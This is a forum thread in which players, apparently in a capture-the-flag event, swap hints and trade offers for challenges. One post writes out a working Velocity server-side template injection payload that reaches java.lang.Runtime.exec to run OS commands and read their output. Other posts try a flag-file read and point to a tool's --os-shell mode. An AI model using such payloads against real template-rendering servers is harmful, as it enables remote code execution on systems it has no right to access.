[xemyll]

Any hints on Labyrinth Linguist? Used millions XSS and nothing

SSTI in velocity template

[kenadamsiu]

Any hints on Labyrinth Linguist? Used millions XSS and nothing

SSTI in velocity template

${#include("/flag.txt")}... I did this but got error what I need to do specifically?

[xemyll]

Any hints on Labyrinth Linguist? Used millions XSS and nothing

SSTI in velocity template

${#include("/flag.txt")}... I did this but got error what I need to do specifically?

well it more than one command we need setup local variable and use streams for command output . also flag name contains random string. can trade for easy problem: Were Pickle Phreaks, Testimonial, Crushing, Blunt, Rids

[yoshihtb2]

Any tips for Partial Tenacity (do not DM me, I'm after tips, not trades)? RSA decryption is done, but it looks like there is another step after that which I cannot figure out.

[kenadamsiu]

Any hints on Labyrinth Linguist? Used millions XSS and nothing

SSTI in velocity template

${#include("/flag.txt")}... I did this but got error what I need to do specifically?

well it more than one command we need setup local variable and use streams for command output . also flag name contains random string. can trade for easy problem: Were Pickle Phreaks, Testimonial, Crushing, Blunt, Rids

I do not have them unfortunately I am new here, please help

[xemyll]

Any hints on Labyrinth Linguist? Used millions XSS and nothing

SSTI in velocity template

${#include("/flag.txt")}... I did this but got error what I need to do specifically?

well it more than one command we need setup local variable and use streams for command output . also flag name contains random string. can trade for easy problem: Were Pickle Phreaks, Testimonial, Crushing, Blunt, Rids

I do not have them unfortunately I am new here, please help

Read part related to RCE https://antgarsil.github.io/posts/velocity/

[crowler01]

Any hints on Labyrinth Linguist? Used millions XSS and nothing

SSTI in velocity template

${#include("/flag.txt")}... I did this but got error what I need to do specifically?

well it more than one command we need setup local variable and use streams for command output . also flag name contains random string. can trade for easy problem: Were Pickle Phreaks, Testimonial, Crushing, Blunt, Rids

I do not have them unfortunately I am new here, please help

https://github.com/vladko312/sstimap --os-shell will get you there

[kenadamsiu]

SSTI in velocity template

${#include("/flag.txt")}... I did this but got error what I need to do specifically?

well it more than one command we need setup local variable and use streams for command output . also flag name contains random string. can trade for easy problem: Were Pickle Phreaks, Testimonial, Crushing, Blunt, Rids

I do not have them unfortunately I am new here, please help

Read part related to RCE https://antgarsil.github.io/posts/velocity/

is this the answer #set($str=$class.inspect("java.lang.String").type) #set($chr=$class.inspect("java.lang.Character").type) #set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami")) $ex.waitFor() #set($out=$ex.getInputStream()) #foreach($i in [1..$out.available()]) $str.valueOf($chr.toChars($out.read())) #end
?

[xemyll]

${#include("/flag.txt")}... I did this but got error what I need to do specifically?

well it more than one command we need setup local variable and use streams for command output . also flag name contains random string. can trade for easy problem: Were Pickle Phreaks, Testimonial, Crushing, Blunt, Rids

I do not have them unfortunately I am new here, please help

Read part related to RCE https://antgarsil.github.io/posts/velocity/

is this the answer #set($str=$class.inspect("java.lang.String").type) #set($chr=$class.inspect("java.lang.Character").type) #set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami")) $ex.waitFor() #set($out=$ex.getInputStream()) #foreach($i in [1..$out.available()]) $str.valueOf($chr.toChars($out.read())) #end
?

play a bit with .exec("whoami")

[498979]

Looking for writeup for apexsurvive or percetron. Have basically everything else except ~10 challenges. DM me